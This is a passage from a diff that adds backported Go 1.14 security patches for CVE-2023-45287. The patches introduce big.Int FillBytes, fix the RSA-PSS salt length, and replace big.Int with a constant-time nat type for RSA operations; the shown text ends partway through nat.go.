+@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ 	m := new(big.Int)
+ 	m.SetBytes(em)
+ 	c := encrypt(new(big.Int), pub, m)
+-	out := c.Bytes()
+ 
+-	if len(out) < k {
+-		// If the output is too small, we need to left-pad with zeros.
+-		t := make([]byte, k)
+-		copy(t[k-len(out):], out)
+-		out = t
+-	}
+-
+-	return out, nil
++	out := make([]byte, k)
++	return c.FillBytes(out), nil
+ }
+ 
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ 	lHash := hash.Sum(nil)
+ 	hash.Reset()
+ 
+-	// Converting the plaintext number to bytes will strip any
+-	// leading zeros so we may have to left pad. We do this unconditionally
+-	// to avoid leaking timing information. (Although we still probably
+-	// leak the number of leading zeros. It's not clear that we can do
+-	// anything about this.)
+-	em := leftPad(m.Bytes(), k)
++	// We probably leak the number of leading zeros.
++	// It's not clear that we can do anything about this.
++	em := m.FillBytes(make([]byte, k))
+ 
+ 	firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ 
+@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ 
+ 	return rest[index+1:], nil
+ }
+-
+-// leftPad returns a new slice of length size. The contents of input are right
+-// aligned in the new slice.
+-func leftPad(input []byte, size int) (out []byte) {
+-	n := len(input)
+-	if n > size {
+-		n = size
+-	}
+-	out = make([]byte, size)
+-	copy(out[len(out)-n:], input)
+-	return
+-}
+diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
+index 2aab323202f7d..314016979afb8 100644
+--- a/src/crypto/tls/key_schedule.go
++++ b/src/crypto/tls/key_schedule.go
+@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
+ 	}
+ 
+ 	xShared, _ := curve.ScalarMult(x, y, p.privateKey)
+-	sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
+-	xBytes := xShared.Bytes()
+-	copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
+-
+-	return sharedKey
++	sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
++	return xShared.FillBytes(sharedKey)
+ }
+ 
+ type x25519Parameters struct {
+diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
+index 0bfb90cd5464a..52c108ff1d624 100644
+--- a/src/crypto/x509/sec1.go
++++ b/src/crypto/x509/sec1.go
+@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
+ // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
+ // sets the curve ID to the given OID, or omits it if OID is nil.
+ func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
+-	privateKeyBytes := key.D.Bytes()
+-	paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+-	copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
+-
++	privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+ 	return asn1.Marshal(ecPrivateKey{
+ 		Version:       1,
+-		PrivateKey:    paddedPrivateKey,
++		PrivateKey:    key.D.FillBytes(privateKey),
+ 		NamedCurveOID: oid,
+ 		PublicKey:     asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
+ 	})
+diff --git a/src/math/big/int.go b/src/math/big/int.go
+index 8816cf5266cc4..65f32487b58c0 100644
+--- a/src/math/big/int.go
++++ b/src/math/big/int.go
+@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
+ }
+ 
+ // Bytes returns the absolute value of x as a big-endian byte slice.
++//
++// To use a fixed length slice, or a preallocated one, use FillBytes.
+ func (x *Int) Bytes() []byte {
+ 	buf := make([]byte, len(x.abs)*_S)
+ 	return buf[x.abs.bytes(buf):]
+ }
+ 
++// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
++// big-endian byte slice, and returns buf.
++//
++// If the absolute value of x doesn't fit in buf, FillBytes will panic.
++func (x *Int) FillBytes(buf []byte) []byte {
++	// Clear whole buffer. (This gets optimized into a memclr.)
++	for i := range buf {
++		buf[i] = 0
++	}
++	x.abs.bytes(buf)
++	return buf
++}
++
+ // BitLen returns the length of the absolute value of x in bits.
+ // The bit length of 0 is 0.
+ func (x *Int) BitLen() int {
+diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
+index e3a1587b3f0ad..3c8557323a032 100644
+--- a/src/math/big/int_test.go
++++ b/src/math/big/int_test.go
+@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
+ 		})
+ 	}
+ }
++
++func TestFillBytes(t *testing.T) {
++	checkResult := func(t *testing.T, buf []byte, want *Int) {
++		t.Helper()
++		got := new(Int).SetBytes(buf)
++		if got.CmpAbs(want) != 0 {
++			t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
++		}
++	}
++	panics := func(f func()) (panic bool) {
++		defer func() { panic = recover() != nil }()
++		f()
++		return
++	}
++
++	for _, n := range []string{
++		"0",
++		"1000",
++		"0xffffffff",
++		"-0xffffffff",
++		"0xffffffffffffffff",
++		"0x10000000000000000",
++		"0xabababababababababababababababababababababababababa",
++		"0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
++	} {
++		t.Run(n, func(t *testing.T) {
++			t.Logf(n)
++			x, ok := new(Int).SetString(n, 0)
++			if !ok {
++				panic("invalid test entry")
++			}
++
++			// Perfectly sized buffer.
++			byteLen := (x.BitLen() + 7) / 8
++			buf := make([]byte, byteLen)
++			checkResult(t, x.FillBytes(buf), x)
++
++			// Way larger, checking all bytes get zeroed.
++			buf = make([]byte, 100)
++			for i := range buf {
++				buf[i] = 0xff
++			}
++			checkResult(t, x.FillBytes(buf), x)
++
++			// Too small.
++			if byteLen > 0 {
++				buf = make([]byte, byteLen-1)
++				if !panics(func() { x.FillBytes(buf) }) {
++					t.Errorf("expected panic for small buffer and value %x", x)
++				}
++			}
++		})
++	}
++}
+diff --git a/src/math/big/nat.go b/src/math/big/nat.go
+index c31ec5156b81d..6a3989bf9d82b 100644
+--- a/src/math/big/nat.go
++++ b/src/math/big/nat.go
+@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
+ }
+ 
+ // bytes writes the value of z into buf using big-endian encoding.
+-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
+-// slice buf[i:]. The number i of unused bytes at the beginning of
+-// buf is returned as result.
++// The value of z is encoded in the slice buf[i:]. If the value of z
++// cannot be represented in buf, bytes panics. The number i of unused
++// bytes at the beginning of buf is returned as result.
+ func (z nat) bytes(buf []byte) (i int) {
+ 	i = len(buf)
+ 	for _, d := range z {
+ 		for j := 0; j < _S; j++ {
+ 			i--
+-			buf[i] = byte(d)
++			if i >= 0 {
++				buf[i] = byte(d)
++			} else if byte(d) != 0 {
++				panic("math/big: buffer too small to fit value")
++			}
+ 			d >>= 8
+ 		}
+ 	}
+ 
++	if i < 0 {
++		i = 0
++	}
+ 	for i < len(buf) && buf[i] == 0 {
+ 		i++
+ 	}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
new file mode 100644
index 0000000000..ae9fcc170c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
+From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
+From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
+Date: Tue, 16 Mar 2021 22:37:46 +0530
+Subject: [PATCH] crypto/rsa: fix salt length calculation with
+ PSSSaltLengthAuto
+
+When PSSSaltLength is set, the maximum salt length must equal:
+
+    (modulus_key_size - 1 + 7)/8 - hash_length - 2
+and for example, with a 4096 bit modulus key, and a SHA-1 hash,
+it should be:
+
+     (4096 -1 + 7)/8 - 20 - 2 = 490
+Previously we'd encounter this error:
+
+     crypto/rsa: key size too small for PSS signature
+
+Fixes #42741
+
+Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Trust: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
+CVE: CVE-2023-45287 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go      |  2 +-
+ src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
+ 2 files changed, 20 insertions(+), 2 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index b2adbedb28fa8..814522de8181f 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ 	saltLength := opts.saltLength()
+ 	switch saltLength {
+ 	case PSSSaltLengthAuto:
+-		saltLength = priv.Size() - 2 - hash.Size()
++		saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
+ 	case PSSSaltLengthEqualsHash:
+ 		saltLength = hash.Size()
+ 	}
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index dfa8d8bb5ad02..c3a6d468497cd 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -12,7 +12,7 @@ import (
+ 	_ "crypto/md5"
+ 	"crypto/rand"
+ 	"crypto/sha1"
+-	_ "crypto/sha256"
++	"crypto/sha256"
+ 	"encoding/hex"
+ 	"math/big"
+ 	"os"
+@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
+ 	}
+ }
+ 
++func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++	key, err := GenerateKey(rand.Reader, 513)
++	if err != nil {
++		t.Fatal(err)
++	}
++	digest := sha256.Sum256([]byte("message"))
++	signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
++		SaltLength: PSSSaltLengthAuto,
++		Hash:       crypto.SHA256,
++	})
++	if err != nil {
++		t.Fatal(err)
++	}
++	if len(signature) == 0 {
++		t.Fatal("empty signature returned")
++	}
++}
++
+ func bigFromHex(hex string) *big.Int {
+ 	n, ok := new(big.Int).SetString(hex, 16)
+ 	if !ok {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
+From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
+Date: Tue, 8 Jun 2021 21:36:06 +0200
+Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
+
+Infamously, big.Int does not provide constant-time arithmetic, making
+its use in cryptographic code quite tricky. RSA uses big.Int
+pervasively, in its public API, for key generation, precomputation, and
+for encryption and decryption. This is a known problem. One mitigation,
+blinding, is already in place during decryption. This helps mitigate the
+very leaky exponentiation operation. Because big.Int is fundamentally
+not constant-time, it's unfortunately difficult to guarantee that
+mitigations like these are completely effective.
+
+This patch removes the use of big.Int for encryption and decryption,
+replacing it with an internal nat type instead. Signing and verification
+are also affected, because they depend on encryption and decryption.
+
+Overall, this patch degrades performance by 55% for private key
+operations, and 4-5x for (much faster) public key operations.
+(Signatures do both, so the slowdown is worse than decryption.)
+
+name                    old time/op  new time/op    delta
+DecryptPKCS1v15/2048-8  1.50ms ± 0%    2.34ms ± 0%    +56.44%  (p=0.000 n=8+10)
+DecryptPKCS1v15/3072-8  4.40ms ± 0%    6.79ms ± 0%    +54.33%  (p=0.000 n=10+9)
+DecryptPKCS1v15/4096-8  9.31ms ± 0%   15.14ms ± 0%    +62.60%  (p=0.000 n=10+10)
+EncryptPKCS1v15/2048-8  8.16µs ± 0%  355.58µs ± 0%  +4258.90%  (p=0.000 n=10+9)
+DecryptOAEP/2048-8      1.50ms ± 0%    2.34ms ± 0%    +55.68%  (p=0.000 n=10+9)
+EncryptOAEP/2048-8      8.51µs ± 0%  355.95µs ± 0%  +4082.75%  (p=0.000 n=10+9)
+SignPKCS1v15/2048-8     1.51ms ± 0%    2.69ms ± 0%    +77.94%  (p=0.000 n=10+10)
+VerifyPKCS1v15/2048-8   7.25µs ± 0%  354.34µs ± 0%  +4789.52%  (p=0.000 n=9+9)
+SignPSS/2048-8          1.51ms ± 0%    2.70ms ± 0%    +78.80%  (p=0.000 n=9+10)
+VerifyPSS/2048-8        8.27µs ± 1%  355.65µs ± 0%  +4199.39%  (p=0.000 n=10+10)
+
+Keep in mind that this is without any assembly at all, and that further
+improvements are likely possible. I think having a review of the logic
+and the cryptography would be a good idea at this stage, before we
+complicate the code too much through optimization.
+
+The bulk of the work is in nat.go. This introduces two new types: nat,
+representing natural numbers, and modulus, representing moduli used in
+modular arithmetic.
+
+A nat has an "announced size", which may be larger than its "true size",
+the number of bits needed to represent this number. Operations on a nat
+will only ever leak its announced size, never its true size, or other
+information about its value. The size of a nat is always clear based on
+how its value is set. For example, x.mod(y, m) will make the announced
+size of x match that of m, since x is reduced modulo m.
+
+Operations assume that the announced size of the operands match what's
+expected (with a few exceptions). For example, x.modAdd(y, m) assumes
+that x and y have the same announced size as m, and that they're reduced
+modulo m.
+
+Nats are represented over unsatured bits.UintSize - 1 bit limbs. This
+means that we can't reuse the assembly routines for big.Int, which use
+saturated bits.UintSize limbs. The advantage of unsaturated limbs is
+that it makes Montgomery multiplication faster, by needing fewer
+registers in a hot loop. This makes exponentiation faster, which
+consists of many Montgomery multiplications.
+
+Moduli use nat internally. Unlike nat, the true size of a modulus always
+matches its announced size. When creating a modulus, any zero padding is
+removed. Moduli will also precompute constants when created, which is
+another reason why having a separate type is desirable.
+
+Updates #20654
+
+Co-authored-by: Filippo Valsorda <filippo@golang.org>
+Change-Id: I73b61f87d58ab912e80a9644e255d552cbadcced
+Reviewed-on: https://go-review.googlesource.com/c/go/+/326012
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Joedian Reid <joedian@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8a81fdf165facdcefa06531de5af98a4db343035]
+CVE: CVE-2023-45287
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/example_test.go |  21 +-
+ src/crypto/rsa/nat.go          | 626 +++++++++++++++++++++++++++++++++
+ src/crypto/rsa/nat_test.go     | 384 ++++++++++++++++++++
+ src/crypto/rsa/pkcs1v15.go     |  47 +--
+ src/crypto/rsa/pss.go          |  50 ++-
+ src/crypto/rsa/pss_test.go     |  10 +-
+ src/crypto/rsa/rsa.go          | 174 ++++-----
+ 7 files changed, 1143 insertions(+), 169 deletions(-)
+ create mode 100644 src/crypto/rsa/nat.go
+ create mode 100644 src/crypto/rsa/nat_test.go
+
+diff --git a/src/crypto/rsa/example_test.go b/src/crypto/rsa/example_test.go
+index 1435b70..1963609 100644
+--- a/src/crypto/rsa/example_test.go
++++ b/src/crypto/rsa/example_test.go
+@@ -12,7 +12,6 @@ import (
+ 	"crypto/sha256"
+ 	"encoding/hex"
+ 	"fmt"
+-	"io"
+ 	"os"
+ )
+ 
+@@ -36,21 +35,17 @@ import (
+ // a buffer that contains a random key. Thus, if the RSA result isn't
+ // well-formed, the implementation uses a random key in constant time.
+ func ExampleDecryptPKCS1v15SessionKey() {
+-	// crypto/rand.Reader is a good source of entropy for blinding the RSA
+-	// operation.
+-	rng := rand.Reader
+-
+ 	// The hybrid scheme should use at least a 16-byte symmetric key. Here
+ 	// we read the random key that will be used if the RSA decryption isn't
+ 	// well-formed.
+ 	key := make([]byte, 32)
+-	if _, err := io.ReadFull(rng, key); err != nil {
++	if _, err := rand.Read(key); err != nil {
+ 		panic("RNG failure")
+ 	}
+ 
+ 	rsaCiphertext, _ := hex.DecodeString("aabbccddeeff")
+ 
+-	if err := DecryptPKCS1v15SessionKey(rng, rsaPrivateKey, rsaCiphertext, key); err != nil {
++	if err := DecryptPKCS1v15SessionKey(nil, rsaPrivateKey, rsaCiphertext, key); err != nil {
+ 		// Any errors that result will be “public� – meaning that they
+ 		// can be determined without any secret information. (For
+ 		// instance, if the length of key is impossible given the RSA
+@@ -86,10 +81,6 @@ func ExampleDecryptPKCS1v15SessionKey() {
+ }
+ 
+ func ExampleSignPKCS1v15() {
+-	// crypto/rand.Reader is a good source of entropy for blinding the RSA
+-	// operation.
+-	rng := rand.Reader
+-
+ 	message := []byte("message to be signed")
+ 
+ 	// Only small messages can be signed directly; thus the hash of a
+@@ -99,7 +90,7 @@ func ExampleSignPKCS1v15() {
+ 	// of writing (2016).
+ 	hashed := sha256.Sum256(message)
+ 
+-	signature, err := SignPKCS1v15(rng, rsaPrivateKey, crypto.SHA256, hashed[:])
++	signature, err := SignPKCS1v15(nil, rsaPrivateKey, crypto.SHA256, hashed[:])
+ 	if err != nil {
+ 		fmt.Fprintf(os.Stderr, "Error from signing: %s\n", err)
+ 		return
+@@ -151,11 +142,7 @@ func ExampleDecryptOAEP() {
+ 	ciphertext, _ := hex.DecodeString("4d1ee10e8f286390258c51a5e80802844c3e6358ad6690b7285218a7c7ed7fc3a4c7b950fbd04d4b0239cc060dcc7065ca6f84c1756deb71ca5685cadbb82be025e16449b905c568a19c088a1abfad54bf7ecc67a7df39943ec511091a34c0f2348d04e058fcff4d55644de3cd1d580791d4524b92f3e91695582e6e340a1c50b6c6d78e80b4e42c5b4d45e479b492de42bbd39cc642ebb80226bb5200020d501b24a37bcc2ec7f34e596b4fd6b063de4858dbf5a4e3dd18e262eda0ec2d19dbd8e890d672b63d368768360b20c0b6b8592a438fa275e5fa7f60bef0dd39673fd3989cc54d2cb80c08fcd19dacbc265ee1c6014616b0e04ea0328c2a04e73460")
+ 	label := []byte("orders")
+ 
+-	// crypto/rand.Reader is a good source of entropy for blinding the RSA
+-	// operation.
+-	rng := rand.Reader
+-
+-	plaintext, err := DecryptOAEP(sha256.New(), rng, test2048Key, ciphertext, label)
++	plaintext, err := DecryptOAEP(sha256.New(), nil, test2048Key, ciphertext, label)
+ 	if err != nil {
+ 		fmt.Fprintf(os.Stderr, "Error from decryption: %s\n", err)
+ 		return
+diff --git a/src/crypto/rsa/nat.go b/src/crypto/rsa/nat.go
+new file mode 100644
+index 0000000..da521c2
+--- /dev/null
++++ b/src/crypto/rsa/nat.go
+@@ -0,0 +1,626 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package rsa
++
++import (
++	"math/big"
++	"math/bits"
++)
++
++const (
++	// _W is the number of bits we use for our limbs.
++	_W = bits.UintSize - 1
++	// _MASK selects _W bits from a full machine word.
++	_MASK = (1 << _W) - 1
++)
++
++// choice represents a constant-time boolean. The value of choice is always
++// either 1 or 0. We use an int instead of bool in order to make decisions in
++// constant time by turning it into a mask.
++type choice uint
++
++func not(c choice) choice { return 1 ^ c }
++
++const yes = choice(1)
++const no = choice(0)
++
++// ctSelect returns x if on == 1, and y if on == 0. The execution time of this
++// function does not depend on its inputs. If on is any value besides 1 or 0,
++// the result is undefined.
++func ctSelect(on choice, x, y uint) uint {
++	// When on == 1, mask is 0b111..., otherwise mask is 0b000...
++	mask := -uint(on)
++	// When mask is all zeros, we just have y, otherwise, y cancels with itself.
++	return y ^ (mask & (y ^ x))
++}
++
++// ctEq returns 1 if x == y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctEq(x, y uint) choice {
++	// If x != y, then either x - y or y - x will generate a carry.
++	_, c1 := bits.Sub(x, y, 0)
++	_, c2 := bits.Sub(y, x, 0)
++	return not(choice(c1 | c2))
++}
++
++// ctGeq returns 1 if x >= y, and 0 otherwise. The execution time of this
++// function does not depend on its inputs.
++func ctGeq(x, y uint) choice {
++	// If x < y, then x - y generates a carry.
++	_, carry := bits.Sub(x, y, 0)
++	return not(choice(carry))
++}
++
++// nat represents an arbitrary natural number
++//
++// Each nat has an announced length, which is the number of limbs it has stored.
++// Operations on this number are allowed to leak this length, but will not leak
++// any information about the values contained in those limbs.
++type nat struct {
++	// limbs is a little-endian representation in base 2^W with
++	// W = bits.UintSize - 1. The top bit is always unset between operations.
++	//
++	// The top bit is left unset to optimize Montgomery multiplication, in the
++	// inner loop of exponentiation. Using fully saturated limbs would leave us
++	// working with 129-bit numbers on 64-bit platforms, wasting a lot of space,
++	// and thus time.
++	limbs []uint
++}
++
++// expand expands x to n limbs, leaving its value unchanged.
++func (x *nat) expand(n int) *nat {
++	for len(x.limbs) > n {
++		if x.limbs[len(x.limbs)-1] != 0 {
++			panic("rsa: internal error: shrinking nat")
++		}
++		x.limbs = x.limbs[:len(x.limbs)-1]
++	}
++	if cap(x.limbs) < n {
++		newLimbs := make([]uint, n)
++		copy(newLimbs, x.limbs)
++		x.limbs = newLimbs
++		return x
++	}
++	extraLimbs := x.limbs[len(x.limbs):n]
++	for i := range extraLimbs {
++		extraLimbs[i] = 0
++	}
++	x.limbs = x.limbs[:n]
++	return x
++}
++
++// reset returns a zero nat of n limbs, reusing x's storage if n <= cap(x.limbs).
++func (x *nat) reset(n int) *nat {
++	if cap(x.limbs) < n {
++		x.limbs = make([]uint, n)
++		return x
++	}
++	for i := range x.limbs {
++		x.limbs[i] = 0
++	}
++	x.limbs = x.limbs[:n]
++	return x
++}
++
++// clone returns a new nat, with the same value and announced length as x.
++func (x *nat) clone() *nat {
++	out := &nat{make([]uint, len(x.limbs))}
++	copy(out.limbs, x.limbs)
++	return out
++}
++
++// natFromBig creates a new natural number from a big.Int.
++//
++// The announced length of the resulting nat is based on the actual bit size of
++// the input, ignoring leading zeroes.
++func natFromBig(x *big.Int) *nat {
++	xLimbs := x.Bits()
++	bitSize := bigBitLen(x)
++	requiredLimbs := (bitSize + _W - 1) / _W
++
++	out := &nat{make([]uint, requiredLimbs)}
++	outI := 0
++	shift := 0
++	for i := range xLimbs {
++		xi := uint(xLimbs[i])
++		out.limbs[outI] |= (xi << shift) & _MASK
++		outI++
++		if outI == requiredLimbs {
++			return out
++		}
++		out.limbs[outI] = xi >> (_W - shift)
++		shift++ // this assumes bits.UintSize - _W = 1
++		if shift == _W {
++			shift = 0
++			outI++
++		}
++	}
++	return out
++}
++
++// fillBytes sets bytes to x as a zero-extended big-endian byte slice.
++//
++// If bytes is not long enough to contain the number or at least len(x.limbs)-1
++// limbs, or has zero length, fillBytes will panic.
++func (x *nat) fillBytes(bytes []byte) []byte {
++	if len(bytes) == 0 {
++		panic("nat: fillBytes invoked with too small buffer")
++	}
++	for i := range bytes {
++		bytes[i] = 0
++	}
++	shift := 0
++	outI := len(bytes) - 1
++	for i, limb := range x.limbs {
++		remainingBits := _W
++		for remainingBits >= 8 {
++			bytes[outI] |= byte(limb) << shift
++			consumed := 8 - shift
++			limb >>= consumed
++			remainingBits -= consumed
++			shift = 0
++			outI--
++			if outI < 0 {
++				if limb != 0 || i < len(x.limbs)-1 {
++					panic("nat: fillBytes invoked with too small buffer")
++				}
++				return bytes
++			}
++		}
++		bytes[outI] = byte(limb)
++		shift = remainingBits
++	}
++	return bytes
++}
++
++// natFromBytes converts a slice of big-endian bytes into a nat.
++//
++// The announced length of the output depends on the length of bytes. Unlike
++// big.Int, creating a nat will not remove leading zeros.
++func natFromBytes(bytes []byte) *nat {
++	bitSize := len(bytes) * 8
++	requiredLimbs := (bitSize + _W - 1) / _W
++
++	out := &nat{make([]uint, requiredLimbs)}
++	outI := 0
++	shift := 0
++	for i := len(bytes) - 1; i >= 0; i-- {
++		bi := bytes[i]
++		out.limbs[outI] |= uint(bi) << shift
++		shift += 8
++		if shift >= _W {
++			shift -= _W
++			out.limbs[outI] &= _MASK
++			outI++
++			if shift > 0 {
++				out.limbs[outI] = uint(bi) >> (8 - shift)
++			}
++		}
++	}
++	return out
++}
++
++// cmpEq returns 1 if x == y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpEq(y *nat) choice {
++	// Eliminate bounds checks in the loop.
++	size := len(x.limbs)
++	xLimbs := x.limbs[:size]
++	yLimbs := y.limbs[:size]
++
++	equal := yes
++	for i := 0; i < size; i++ {
++		equal &= ctEq(xLimbs[i], yLimbs[i])
++	}
++	return equal
++}
++
++// cmpGeq returns 1 if x >= y, and 0 otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) cmpGeq(y *nat) choice {
++	// Eliminate bounds checks in the loop.
++	size := len(x.limbs)
++	xLimbs := x.limbs[:size]
++	yLimbs := y.limbs[:size]
++
++	var c uint
++	for i := 0; i < size; i++ {
++		c = (xLimbs[i] - yLimbs[i] - c) >> _W
++	}
++	// If there was a carry, then subtracting y underflowed, so
++	// x is not greater than or equal to y.
++	return not(choice(c))
++}
++
++// assign sets x <- y if on == 1, and does nothing otherwise.
++//
++// Both operands must have the same announced length.
++func (x *nat) assign(on choice, y *nat) *nat {
++	// Eliminate bounds checks in the loop.
++	size := len(x.limbs)
++	xLimbs := x.limbs[:size]
++	yLimbs := y.limbs[:size]
++
++	for i := 0; i < size; i++ {
++		xLimbs[i] = ctSelect(on, yLimbs[i], xLimbs[i])
++	}
++	return x
++}
++
++// add computes x += y if on == 1, and does nothing otherwise. It returns the
++// carry of the addition regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) add(on choice, y *nat) (c uint) {
++	// Eliminate bounds checks in the loop.
++	size := len(x.limbs)
++	xLimbs := x.limbs[:size]
++	yLimbs := y.limbs[:size]
++
++	for i := 0; i < size; i++ {
++		res := xLimbs[i] + yLimbs[i] + c
++		xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++		c = res >> _W
++	}
++	return
++}
++
++// sub computes x -= y if on == 1, and does nothing otherwise. It returns the
++// borrow of the subtraction regardless of on.
++//
++// Both operands must have the same announced length.
++func (x *nat) sub(on choice, y *nat) (c uint) {
++	// Eliminate bounds checks in the loop.
++	size := len(x.limbs)
++	xLimbs := x.limbs[:size]
++	yLimbs := y.limbs[:size]
++
++	for i := 0; i < size; i++ {
++		res := xLimbs[i] - yLimbs[i] - c
++		xLimbs[i] = ctSelect(on, res&_MASK, xLimbs[i])
++		c = res >> _W
++	}
++	return
++}
++
++// modulus is used for modular arithmetic, precomputing relevant constants.
++//
++// Moduli are assumed to be odd numbers. Moduli can also leak the exact
++// number of bits needed to store their value, and are stored without padding.
++//
++// Their actual value is still kept secret.
++type modulus struct {
++	// The underlying natural number for this modulus.
++	//
++	// This will be stored without any padding, and shouldn't alias with any
++	// other natural number being used.
++	nat     *nat
++	leading int  // number of leading zeros in the modulus
++	m0inv   uint // -nat.limbs[0]�¹ mod _W
++}
++
++// minusInverseModW computes -x�¹ mod _W with x odd.
++//
++// This operation is used to precompute a constant involved in Montgomery
++// multiplication.
++func minusInverseModW(x uint) uint {
++	// Every iteration of this loop doubles the least-significant bits of
++	// correct inverse in y. The first three bits are already correct (1�¹ = 1,
++	// 3�¹ = 3, 5�¹ = 5, and 7�¹ = 7 mod 8), so doubling five times is enough
++	// for 61 bits (and wastes only one iteration for 31 bits).
++	//
++	// See https://crypto.stackexchange.com/a/47496.
++	y := x
++	for i := 0; i < 5; i++ {
++		y = y * (2 - x*y)
++	}
++	return (1 << _W) - (y & _MASK)
++}
++
++// modulusFromNat creates a new modulus from a nat.
++//
++// The nat should be odd, nonzero, and the number of significant bits in the
++// number should be leakable. The nat shouldn't be reused.
++func modulusFromNat(nat *nat) *modulus {
++	m := &modulus{}
++	m.nat = nat
++	size := len(m.nat.limbs)
++	for m.nat.limbs[size-1] == 0 {
++		size--
++	}
++	m.nat.limbs = m.nat.limbs[:size]
++	m.leading = _W - bitLen(m.nat.limbs[size-1])
++	m.m0inv = minusInverseModW(m.nat.limbs[0])
++	return m
++}
++
++// bitLen is a version of bits.Len that only leaks the bit length of n, but not
++// its value. bits.Len and bits.LeadingZeros use a lookup table for the
++// low-order bits on some architectures.
++func bitLen(n uint) int {
++	var len int
++	// We assume, here and elsewhere, that comparison to zero is constant time
++	// with respect to different non-zero values.
++	for n != 0 {
++		len++
++		n >>= 1
++	}
++	return len
++}
++
++// bigBitLen is a version of big.Int.BitLen that only leaks the bit length of x,
++// but not its value. big.Int.BitLen uses bits.Len.
++func bigBitLen(x *big.Int) int {
++	xLimbs := x.Bits()
++	fullLimbs := len(xLimbs) - 1
++	topLimb := uint(xLimbs[len(xLimbs)-1])
++	return fullLimbs*bits.UintSize + bitLen(topLimb)
++}
++
++// modulusSize returns the size of m in bytes.
++func modulusSize(m *modulus) int {
++	bits := len(m.nat.limbs)*_W - int(m.leading)
++	return (bits + 7) / 8
++}
++
++// shiftIn calculates x = x << _W + y mod m.
++//
++// This assumes that x is already reduced mod m, and that y < 2^_W.
++func (x *nat) shiftIn(y uint, m *modulus) *nat {
